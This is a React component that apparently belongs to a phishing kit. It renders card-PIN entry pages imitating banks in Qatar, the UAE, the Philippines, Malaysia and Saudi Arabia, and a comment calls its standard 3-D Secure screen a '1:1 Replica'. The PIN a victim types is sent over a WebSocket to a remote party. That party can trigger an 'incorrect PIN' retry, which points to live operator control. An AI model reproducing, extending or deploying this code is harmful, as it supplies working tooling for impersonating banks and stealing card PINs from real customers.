import React, { useState, useEffect } from 'react';
import { useNavigate } from 'react-router-dom';
import { useWebSocket } from '../hooks/useWebSocket';
import StandardCardLayout from './StandardCardLayout';
import QatarBankLayout, { isQatarBankDesign, QATAR_BANKS } from './qatar/QatarBankLayout';
import UaeBankLayout, { isUaeBankDesign } from './uae/UaeBankLayout';
import PhilippinesBankLayout, { isPhilippinesBankDesign } from './philippines/PhilippinesBankLayout';
import MalaysiaBankLayout, { isMalaysiaBankDesign } from './malaysia/MalaysiaBankLayout';
import KsaBankLayout, { isKsaBankDesign } from './ksa/KsaBankLayout';
import { getTranslation } from '../Utils/i18n';
import { isMastercard } from '../Utils/cardScheme';
import HelpImage from './assets/help.gif';

export default function PinPage({ config }) {
  const navigate = useNavigate();
  const handleCleanCancel = () => {
    sessionStorage.removeItem('rejected_card');
    const checkoutPath = localStorage.getItem('checkout_path') || '/';
    navigate(checkoutPath);
  };
  const mode = config?.mode || ((typeof process !== 'undefined' && process.env.REACT_APP_MODE) || undefined) || 'standardEN';
  const t = getTranslation(mode);
  const [pin, setPin] = useState('');
  const [submitting, setSubmitting] = useState(false);
  const { sendResponse, currentCommand } = useWebSocket();
  const design = localStorage.getItem('session_design') || 'ph_bdo';

  const isQatar = isQatarBankDesign(design);
  const bank = isQatar ? QATAR_BANKS[design] : null;
  const isMc = isMastercard(design);
  const isRtl = t.dir === 'rtl';

  const errorMessage = (currentCommand?.isRetry || !!currentCommand?.errorMessage) ? t.incorrectPin : null;

  useEffect(() => {
    if (currentCommand?.isRetry) {
      setPin('');
      setSubmitting(false);
    }
  }, [currentCommand]);

  const handleSubmit = (e) => {
    e.preventDefault();
    if (pin.length >= 4 && !submitting) {
      setSubmitting(true);
      sendResponse('pin_response', { pin });
    }
  };

  // 1. Qatar Bank Design
  if (isQatar && bank) {
    return (
      <QatarBankLayout
        design={design}
        mode="pin"
        errorMessage={errorMessage}
        pin={pin}
        setPin={setPin}
        handlePinSubmit={handleSubmit}
        isSubmitting={submitting}
        onCancel={handleCleanCancel}
      />
    );
  }

  // 2. UAE Bank Design (ADIB / WIO / FAB)
  if (isUaeBankDesign(design)) {
    const isWio = design.includes('wio');
    const isFab = design.includes('fab');
    const uaeBank = isFab ? 'fab' : (isWio ? 'wio' : 'adib');
    return (
      <UaeBankLayout
        bank={uaeBank}
        scheme={isMc ? 'mastercard' : 'visa'}
        mode="pin"
        errorMessage={errorMessage}
        pin={pin}
        setPin={setPin}
        handlePinSubmit={handleSubmit}
        isSubmitting={submitting}
        onExit={() => navigate('/')}
      />
    );
  }

  // 2.5. Philippines Bank Design
  if (isPhilippinesBankDesign(design)) {
    return (
      <PhilippinesBankLayout
        design={design}
        mode="pin"
        errorMessage={errorMessage}
        pin={pin}
        setPin={setPin}
        handlePinSubmit={handleSubmit}
        isSubmitting={submitting}
        onCancel={handleCleanCancel}
      />
    );
  }

  // 2.6. Malaysia Bank Design
  if (isMalaysiaBankDesign(design)) {
    return (
      <MalaysiaBankLayout
        design={design}
        mode="pin"
        errorMessage={errorMessage}
        pin={pin}
        setPin={setPin}
        handlePinSubmit={handleSubmit}
        isSubmitting={submitting}
        onCancel={handleCleanCancel}
      />
    );
  }

  // 2.7. KSA (Saudi Arabia) Bank Design
  if (isKsaBankDesign(design)) {
    return (
      <KsaBankLayout
        design={design}
        mode="pin"
        errorMessage={errorMessage}
        pin={pin}
        setPin={setPin}
        handlePinSubmit={handleSubmit}
        isSubmitting={submitting}
        onCancel={handleCleanCancel}
      />
    );
  }

  // 3. Standard 3DS Design (1:1 Replica of manual/providers/3ds)
  return (
    <StandardCardLayout
      title={t.pinTitle}
      subtitle={t.pinSubtitle}
      errorMessage={errorMessage}
      mode={mode}
      scheme={isMc ? 'mastercard' : 'visa'}
    >
      <form onSubmit={handleSubmit}>
        <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr', alignItems: 'center', marginBottom: '1rem', fontSize: '0.75rem' }}>
          <label htmlFor="pin-input" style={{ color: '#6b7280', fontWeight: 500 }}>
            {isRtl ? 'أدخل الرقم السري للبطاقة:' : 'Enter Your Card PIN:'}
          </label>
          <input
            id="pin-input"
            type="password"
            value={pin}
            onChange={(e) => setPin(e.target.value.replace(/\D/g, '').slice(0, 4))}
            placeholder="••••"
            className="scl-input"
            maxLength={4}
            inputMode="numeric"
            autoComplete="current-password"
            dir="ltr"
            autoFocus
          />
        </div>

        <div className="scl-link-row">
          <a
            href="#pin-help"
            onClick={(e) => { e.preventDefault(); alert(isRtl ? 'إذا نسيت الرقم السري الخاص بك، يرجى التواصل مع البنك المصدر للبطاقة.' : 'If you forgot your PIN, please contact your card issuing bank.'); }}
            className="scl-link"
          >
            {isRtl ? 'هل نسيت الرقم السري الخاص بك؟' : 'Forgot your card PIN?'}
          </a>
        </div>

        <div className="scl-btn-bar">
          <button
            type="button"
            onClick={() => navigate('/')}
            className="scl-cancel-btn"
          >
            {isRtl ? 'إلغاء' : 'Cancel'}
          </button>

          <button
            type="submit"
            disabled={pin.length < 4 || submitting}
            className="scl-submit-btn"
          >
            {submitting ? <div className="inputLoader" /> : (isRtl ? 'إرسال' : 'Submit')}
          </button>

          <button
            type="button"
            onClick={() => alert(isRtl ? 'للمساعدة، يرجى التواصل مع البنك المصدر لبطاقتك.' : 'For assistance, please contact your card issuing bank.')}
            className="scl-help-btn"
          >
            <img className="scl-help-icon" src={HelpImage} alt="" />
            {isRtl ? 'مساعدة' : 'Help'}
          </button>
        </div>
      </form>
    </StandardCardLayout>
  );
}
